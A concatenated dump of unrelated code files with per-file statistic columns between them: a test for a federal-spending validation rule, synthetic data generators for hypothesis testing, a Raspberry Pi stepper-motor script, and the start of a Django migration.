ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] + 1,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] + 1,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] + 1,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] + 1,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] + 1,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] + 1,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] + 1,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] + 1,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] + 1,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] + 1,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] + 1,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] + 1,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] + 1,
tas=af_dict['tas'],
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op2 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] + 1,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] + 1,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] + 1,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] + 1,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] + 1,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] + 1,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] + 1,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] + 1,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] + 1,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] + 1,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] + 1,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] + 1,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] + 1,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] + 1,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] + 1,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] + 1,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] + 1,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] + 1,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] + 1,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] + 1,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] + 1,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] + 1,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] + 1,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] + 1,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] + 1,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] + 1,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] + 1,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] + 1,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] + 1,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] + 1,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] + 1,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] + 1,
tas='some-other-tas',
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op3 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] + 1,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] + 1,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] + 1,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] + 1,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] + 1,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] + 1,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] + 1,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] + 1,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] + 1,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] + 1,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] + 1,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] + 1,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] + 1,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] + 1,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] + 1,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] + 1,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] + 1,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] + 1,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] + 1,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] + 1,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] + 1,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] + 1,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] + 1,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] + 1,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] + 1,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] + 1,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] + 1,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] + 1,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] + 1,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] + 1,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] + 1,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] + 1,
tas=af_dict['tas'],
program_activity_code='some-other-code',
submission_id=af_dict['submission_id']
)
errors = number_of_errors(_FILE, database, models=[af1, op1, op2, op3])
assert errors == 1
| 72.720721
| 108
| 0.769533
| 3,141
| 24,216
| 5.311047
| 0.036931
| 0.075531
| 0.074452
| 0.023738
| 0.959957
| 0.864704
| 0.802841
| 0.775267
| 0.765436
| 0.765436
| 0
| 0.112091
| 0.147877
| 24,216
| 332
| 109
| 72.939759
| 0.696341
| 0.013916
| 0
| 0.703226
| 0
| 0
| 0.35104
| 0.34278
| 0
| 0
| 0
| 0
| 0.009677
| 1
| 0.009677
| false
| 0
| 0.012903
| 0
| 0.022581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54495868ab4b502b7abcd7bb22195b1eadfd324a
| 15,188
|
py
|
Python
|
data_gen.py
|
sashapodkopaev/chrome-robust-hypothesis-testing
|
e3a2655f4d94f3987e3d670c8b66fb99c8d0cb45
|
[
"Apache-2.0"
] | null | null | null |
data_gen.py
|
sashapodkopaev/chrome-robust-hypothesis-testing
|
e3a2655f4d94f3987e3d670c8b66fb99c8d0cb45
|
[
"Apache-2.0"
] | null | null | null |
data_gen.py
|
sashapodkopaev/chrome-robust-hypothesis-testing
|
e3a2655f4d94f3987e3d670c8b66fb99c8d0cb45
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
def generate_seq_from_gamma(num_of_obs, gamma_shape=25000, gamma_scale=0.1):
"""
Function that samples metric 1 for a given user
Parameters
----------
num_of_obs: int
number of observations for a given user
gamma_shape: float
shape parameter, or k^star, for the gamma distribution
gamma_scale: float
scale parameter, or theta^star, for the gamma distribution
Returns
----------
cur_observations: array_like
sampled metric 1 values for a given user
"""
# standard deviations for parameters of the gamma
shape_std_value = 2*gamma_shape
scale_std_value = 2*gamma_scale
# sample parameters
shape_array = np.random.normal(
loc=gamma_shape, scale=shape_std_value, size=num_of_obs)
scale_array = np.random.normal(
loc=gamma_scale, scale=scale_std_value, size=num_of_obs)
# truncate parameters
shape_array = np.maximum(shape_array, gamma_shape/3)
scale_array = np.maximum(scale_array, gamma_scale/3)
# sample metric values
cur_observations = np.random.gamma(shape_array, scale_array)
return cur_observations
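# Example (editorial addition, illustrative only):
#     obs = generate_seq_from_gamma(5)   # five metric-1 draws for one user
#     obs.shape                          # -> (5,)
# Each draw uses its own (shape, scale) pair sampled around (gamma_shape, gamma_scale)
# and floored at a third of the nominal value, so per-observation variance is inflated
# relative to a plain gamma sample with fixed parameters.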
def generate_raw_data(number_of_users, gamma_shape=25000, gamma_scale=0.1):
"""
Function that is used to generate Metric 1;
full description can be found in the supporting notebook
Parameters
----------
number_of_users: int
number of users in given treatment/control group
gamma_shape: float
shape parameter, or k^star, for the gamma distribution
gamma_scale: float
scale parameter, or theta^star, for the gamma distribution
Returns
----------
raw_data: Dataframe
Dataframe with two columns:
- Client ID
- Metric value
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
# sample metric values for each user
raw_data = [generate_seq_from_gamma(num_of_obs, gamma_shape, gamma_scale)
for num_of_obs in number_of_observations_per_user]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
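# Example (editorial addition, illustrative only):
#     df = generate_raw_data(100)
#     df.groupby('Client ID').size()     # recovers the geometric(p=0.03) per-user counts
# The frame is long-format with one row per (user, observation) pair; both columns are
# float-typed because np.vstack promotes the integer IDs to the metric dtype.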
def generate_raw_data_exponential(number_of_users, scale_param=1):
"""
Function that generates per-user data from an exponential distribution
Parameters
----------
number_of_users: int
number of users in given treatment/control group
scale_param: float
scale parameter for the exponential distribution
Returns
----------
raw_data: Dataframe
Dataframe with two columns:
- Client ID
- Metric value
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
# sample metric values for each user
raw_data = [np.random.exponential(scale=scale_param, size=num_of_obs)
for num_of_obs in number_of_observations_per_user]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def generate_raw_data_lognormal(number_of_users, mean_param=0, sigma_param=1):
"""
Function that generates per-user data from a lognormal distribution
Parameters
----------
number_of_users: int
number of users in given treatment/control group
mean_param: float
mean parameter for the lognormal distribution
sigma_param: float
std parameter for the lognormal distribution
Returns
----------
raw_data: Dataframe
Dataframe with two columns:
- Client ID
- Metric value
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
# sample metric values for each user
raw_data = [np.random.lognormal(mean=mean_param, sigma=sigma_param, size=num_of_obs)
for num_of_obs in number_of_observations_per_user]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def generate_raw_data_mixture_of_lognormal(number_of_users, vec_of_means, vec_of_stds, weights):
"""
Function that generates per-user data from a two-component mixture of lognormal distributions
"""
# sample number of observations per user
number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users)
cluster_asgn = [np.random.choice([0, 1], size=num_of_obs, p=weights)
for num_of_obs in number_of_observations_per_user]
# sample metric values for each user
raw_data = [np.random.lognormal(mean=vec_of_means[cur_cluster_assignment],
sigma=vec_of_stds[cur_cluster_assignment],
size=len(cur_cluster_assignment))
for cur_cluster_assignment in cluster_asgn]
ids = [np.repeat(client_id, num_of_obs) for client_id,
num_of_obs in enumerate(number_of_observations_per_user)]
# stack IDs and observations
ids_array = np.hstack(ids)
metric_values = np.hstack(raw_data)
return pd.DataFrame(np.vstack([ids_array, metric_values]).transpose(), columns=['Client ID', 'Metric Value'])
def get_binned_data_client_level(raw_data, bins_boundaries):
"""
Function that bins raw data
Parameters
----------
raw_data: Dataframe
raw data to be used to create binned data;
Dataframe has two columns:
- Client ID
- Metric value
bins_boundaries: array_like
array of bins' boundaries
(with the right-most boundary for the overflow bin
and the left-most boundary for the underflow bin included)
Example: [0,1,2,3,4] corresponds to np.histogram bins
[0,1), [1,2), [2,3) and [3,4] (only the last bin includes its right edge)
Returns
----------
binned_data: Dataframe
binned data at a Client level
"""
# get number of bins
num_of_hist_bins = len(bins_boundaries) - 1
# using list comprehension, create list of lists with first entry being the client ID,
# followed by the histogram for the client
binned_data = [[[cur_id] + np.histogram(cur_group_of_metric_values['Metric Value'].values,
bins=bins_boundaries)[0].tolist()]
for cur_id, cur_group_of_metric_values in raw_data.groupby('Client ID')]
# convert an array to output Dataframe
cols = ['Client ID'] + ['Bin ' + str(i) for i in range(num_of_hist_bins)]
binned_data = pd.DataFrame(np.vstack(binned_data), columns=cols)
return binned_data
def get_binned_data_cookie_bucket_level(raw_data, number_of_buckets, bins_boundaries):
"""
Function that bins raw data and aggregates histograms at a cookie bucket level
Parameters
----------
raw_data: Dataframe
raw data to be used to create binned data;
Dataframe has two columns:
- Client ID
- Metric value
number_of_buckets: int
number of cookie buckets to be used
Bucketing is performed based on the remainder of
the ID when divided by number_of_buckets
bins_boundaries: array_like
array of bins' boundaries
(with the right-most boundary for the overflow bin
and the left-most boundary for the underflow bin included)
Example: [0,1,2,3,4] corresponds to np.histogram bins
[0,1), [1,2), [2,3) and [3,4] (only the last bin includes its right edge)
Returns
----------
binned_data: Dataframe
Dataframe with each row corresponding to the histogram
of a given cookie buckets
"""
# get number of bins
num_of_hist_bins = len(bins_boundaries) - 1
# get Clients' buckets
buckets = raw_data['Client ID'] % number_of_buckets
binned_data = [np.histogram(cur_group_of_metric_values['Metric Value'].values,
bins=bins_boundaries)[0]
for _, cur_group_of_metric_values in raw_data.groupby(buckets)]
# convert an array to output Dataframe
cols = ['Bin ' + str(i) for i in range(num_of_hist_bins)]
binned_data = pd.DataFrame(np.vstack(binned_data), columns=cols)
return binned_data
def generate_data_mixture_exp_bucket_level(number_of_users, scale_params, weights, num_of_cookie_buckets, bins_boundaries):
"""
Function that generates data from a mixture of exponential distributions, but at a cookie-bucket level,
i.e. data points in a given cookie bucket are generated from the same distribution; a shift may occur
in some (small) number of buckets
-- could be generalized to more than two components
"""
# sample number of observations per user
treatment_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[0])
control_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[1])
# get IDs to compute number of observations in each cookie bucket
treat_user_ids = np.arange(number_of_users[0])
control_user_ids = np.arange(number_of_users[1])
# match clients with cookie buckets
treat_bucket_assignment = treat_user_ids % num_of_cookie_buckets
control_bucket_assignment = control_user_ids % num_of_cookie_buckets
# compute number of observations per cookie bucket
pos_cookie_bucket_indices = np.arange(num_of_cookie_buckets)
num_of_obs_cookie_bucket_treat = [treatment_number_of_observations_per_user[treat_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
num_of_obs_cookie_bucket_control = [control_number_of_observations_per_user[control_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
# define which component to sample from for each cookie bucket
comp_assgn = np.random.choice(
np.arange(len(scale_params)), size=num_of_cookie_buckets, p=weights)
# sample data
raw_obs_treat = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_treat[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
raw_obs_control = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_control[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
# get binned data
binned_data_treat = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_treat]
binned_data_control = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_control]
return np.stack(binned_data_treat), np.stack(binned_data_control)
def generate_data_single_corrupted_exp_bucket_level(number_of_users, scale_params, num_of_cookie_buckets, bins_boundaries):
"""
Function that generates data from a mixture of exponential distributions, but at a cookie-bucket level,
i.e. data points in a given cookie bucket are generated from the same distribution; a shift may occur
in exactly one cookie bucket, irrespective of the total number of cookie buckets
-- could be generalized to more than two components
"""
# sample number of observations per user
treatment_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[0])
control_number_of_observations_per_user = np.random.geometric(
p=0.03, size=number_of_users[1])
# get IDs to compute number of observations in each cookie bucket
treat_user_ids = np.arange(number_of_users[0])
control_user_ids = np.arange(number_of_users[1])
# match clients with cookie buckets
treat_bucket_assignment = treat_user_ids % num_of_cookie_buckets
control_bucket_assignment = control_user_ids % num_of_cookie_buckets
# compute number of observations per cookie bucket
pos_cookie_bucket_indices = np.arange(num_of_cookie_buckets)
num_of_obs_cookie_bucket_treat = [treatment_number_of_observations_per_user[treat_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
num_of_obs_cookie_bucket_control = [control_number_of_observations_per_user[control_bucket_assignment
== cur_cookie_bucket].sum()
for cur_cookie_bucket in pos_cookie_bucket_indices]
# define which component to sample from for each cookie bucket
comp_assgn = np.zeros(num_of_cookie_buckets, dtype='int')
comp_assgn[0] = 1
np.random.shuffle(comp_assgn)
# sample data
raw_obs_treat = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_treat[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
raw_obs_control = [np.random.exponential(scale=scale_params[comp_assgn[cur_cookie_bucket]],
size=num_of_obs_cookie_bucket_control[cur_cookie_bucket])
for cur_cookie_bucket in pos_cookie_bucket_indices]
# get binned data
binned_data_treat = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_treat]
binned_data_control = [np.histogram(cur_bucket, bins=bins_boundaries)[0]
for cur_bucket in raw_obs_control]
return np.stack(binned_data_treat), np.stack(binned_data_control)
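# Minimal end-to-end sketch (editorial addition, not part of the original script): generate
# raw per-user data, then bin it at the client level and at the cookie-bucket level. The bin
# boundaries and user counts below are hypothetical and only chosen to exercise the helpers.
if __name__ == "__main__":
    demo_raw = generate_raw_data_exponential(number_of_users=50, scale_param=1.0)
    demo_bins = [0.0, 0.5, 1.0, 2.0, 5.0, np.inf]  # last edge acts as the overflow bin
    client_hists = get_binned_data_client_level(demo_raw, demo_bins)
    bucket_hists = get_binned_data_cookie_bucket_level(demo_raw, 10, demo_bins)
    print(client_hists.shape, bucket_hists.shape)  # -> (50, 6) and (10, 5)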
| 38.744898
| 123
| 0.662563
| 2,005
| 15,188
| 4.716209
| 0.101247
| 0.054146
| 0.065567
| 0.068105
| 0.808587
| 0.79558
| 0.785321
| 0.770093
| 0.762056
| 0.732551
| 0
| 0.008444
| 0.267053
| 15,188
| 391
| 124
| 38.84399
| 0.840999
| 0.346392
| 0
| 0.676692
| 1
| 0
| 0.015597
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067669
| false
| 0
| 0.015038
| 0
| 0.150376
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
545d98048e2dcc8a1e57a265df752d04bbad1fd4
| 6,499
|
py
|
Python
|
src/motor1.py
|
Aeturnum7/Automate-AI-Chess
|
6b691173ea716424017126c89bd0d0aa975e7d05
|
[
"MIT"
] | 4
|
2019-06-26T10:09:50.000Z
|
2020-11-21T07:55:59.000Z
|
src/motor1.py
|
Aeturnum7/Automate-AI-Chess
|
6b691173ea716424017126c89bd0d0aa975e7d05
|
[
"MIT"
] | 2
|
2019-06-27T22:52:43.000Z
|
2019-10-02T17:48:45.000Z
|
src/motor1.py
|
Aeturnum7/Automate-AI-Chess
|
6b691173ea716424017126c89bd0d0aa975e7d05
|
[
"MIT"
] | 3
|
2019-06-30T18:40:22.000Z
|
2019-10-16T09:42:56.000Z
|
import RPi.GPIO as GPIO
import time
in3 = 36
in2 = 32
in1 = 22
in4 = 38
out1 = in2
out2 = in3
out3 = in1
out4 = in4
i = 0
positive = 0
negative = 0
y = 0
slp = 0.001
enb=40
ena=18
GPIO.setmode(GPIO.BOARD)
GPIO.setup(enb, GPIO.OUT)
GPIO.output(enb, GPIO.HIGH)
GPIO.setup(ena, GPIO.OUT)
GPIO.output(ena, GPIO.HIGH)
GPIO.setup(out1, GPIO.OUT)
GPIO.setup(out2, GPIO.OUT)
GPIO.setup(out3, GPIO.OUT)
GPIO.setup(out4, GPIO.OUT)
nstep=20
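# Note (editorial addition): rotate() below drives the four outputs out1..out4 through an
# eight-state half-step sequence. A positive dir walks the sequence forward and a negative
# dir walks it backward, roughly 400 half-steps per call with slp seconds of dwell per
# half-step; rotatemotor(x) further down simply repeats rotate() abs(x) times in the
# requested direction.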
def rotate(dir):
i = 0
positive = 0
negative = 0
y = 0
slp = 0.001
x = 400 * dir
if x > 0 and x <= 400:
for y in range(x, 0, -1):
if negative == 1:
if i == 7:
i = 0
else:
i = i + 1
y = y + 2
negative = 0
positive = 1
# print((x+1)-y)
if i == 0:
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 1:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 2:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 3:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 4:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 5:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 6:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 7:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
# time.sleep(1)
if i == 7:
i = 0
continue
i = i + 1
elif x < 0 and x >= -400:
x = x * -1
for y in range(x, 0, -1):
if positive == 1:
if i == 0:
i = 7
else:
i = i - 1
y = y + 3
positive = 0
negative = 1
# print((x+1)-y)
if i == 0:
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 1:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 2:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 3:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.HIGH)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 4:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.LOW)
time.sleep(slp)
elif i == 5:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.HIGH)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 6:
# time.sleep(1)
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
elif i == 7:
# time.sleep(1)
GPIO.output(out1, GPIO.HIGH)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.HIGH)
time.sleep(slp)
# time.sleep(1)
if i == 0:
i = 7
continue
i = i - 1
def rotatemotor(x):
GPIO.output(out1, GPIO.LOW)
GPIO.output(out2, GPIO.LOW)
GPIO.output(out3, GPIO.LOW)
GPIO.output(out4, GPIO.LOW)
dir = 1
if x < 0:
dir = -1
x = x * -1
for i in range(x):
rotate(dir)
# try:
# while 1:
# # GPIO.output(out1, GPIO.LOW)
# # GPIO.output(out2, GPIO.LOW)
# # GPIO.output(out3, GPIO.LOW)
# # GPIO.output(out4, GPIO.LOW)
# x = input()
# rotatemotor(x)
# except KeyboardInterrupt:
# GPIO.cleanup()
def initializemotor1():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(enb, GPIO.OUT)
GPIO.output(enb, GPIO.HIGH)
GPIO.setup(ena, GPIO.OUT)
GPIO.output(ena, GPIO.HIGH)
GPIO.setup(out1, GPIO.OUT)
GPIO.setup(out2, GPIO.OUT)
GPIO.setup(out3, GPIO.OUT)
GPIO.setup(out4, GPIO.OUT)
| 24.524528
| 44
| 0.436529
| 775
| 6,499
| 3.660645
| 0.086452
| 0.267889
| 0.139584
| 0.215721
| 0.88509
| 0.878745
| 0.865351
| 0.865351
| 0.854071
| 0.854071
| 0
| 0.055061
| 0.446684
| 6,499
| 264
| 45
| 24.617424
| 0.733871
| 0.078012
| 0
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016667
| false
| 0
| 0.011111
| 0
| 0.027778
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
54a549361d8656405a5287464b3ea174d1cb2439
| 3,106
|
py
|
Python
|
voxel_globe/meta/migrations/0018_auto_20161111_1628.py
|
ngageoint/voxel-globe
|
91f386de652b704942165889c10468b2c4cf4eec
|
[
"MIT"
] | 28
|
2015-07-27T23:57:24.000Z
|
2020-04-05T15:10:52.000Z
|
voxel_globe/meta/migrations/0018_auto_20161111_1628.py
|
VisionSystemsInc/voxel_globe
|
6eb3fca5586726428e9d914f7b730ca164c64a52
|
[
"MIT"
] | 50
|
2016-02-11T15:50:22.000Z
|
2016-10-27T22:38:27.000Z
|
voxel_globe/meta/migrations/0018_auto_20161111_1628.py
|
ngageoint/voxel-globe
|
91f386de652b704942165889c10468b2c4cf4eec
|
[
"MIT"
] | 8
|
2015-07-27T19:22:03.000Z
|
2021-01-04T09:44:48.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-11 16:28
